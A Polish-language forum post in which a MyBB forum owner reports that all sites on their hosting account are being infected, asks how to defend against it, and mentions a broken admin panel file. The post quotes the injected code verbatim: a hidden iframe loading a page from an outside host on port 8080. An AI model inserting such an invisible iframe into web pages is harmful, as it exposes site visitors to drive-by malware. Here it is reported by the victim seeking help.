Kilka szczegółów o moim forum:
wersja skryptu MyBB:1.4.8
wersja bazy MySQL, Postgre: MySQL
wersja używanego PHP: 5.1.35
adres forum: tworzymy.com.pl
firma hostingowa: az.pl
spis wtyczek: brak wtyczek
Opis problemu:
Od jakiegoś czasu zauważyłem że wszystkie strony umieszczone na moim koncie hostingowym (az) są infekowane szkodliwym kodem a dokładnie tym:
<iframe src="http://q47.in:8080/index.php" width=102 height=174 style="visibility: hidden"></iframe>
Skutkuje to tym, że strona jest klasyfikowana przez Google jako "rozprzestrzeniająca niebezpieczne aplikacje" (to w przypadku stron napisanych w xhtml).
W przypadku forum najpierw ukazała mi się pusta strony więc podmieniłem główny plik index.php z paczki instalacyjnej i pomogło. Jednak próby logowania do PA kończyły się niepowodzeniem aż w końcu ukazał mi się błąd:
Parse error:... .../mybb/admin/modules/home/index.php on line 165
Co znajduje się w podanym pliku i lini kodu nie trudno się domyślić.
Znacie jakieś inne metody bronienia się przed tego typu syfem oprócz tych standardowych czyli: oczyszczeniem stron, zmianą haseł kont FTP, nie zapamiętywaniem ich w systemie, programach?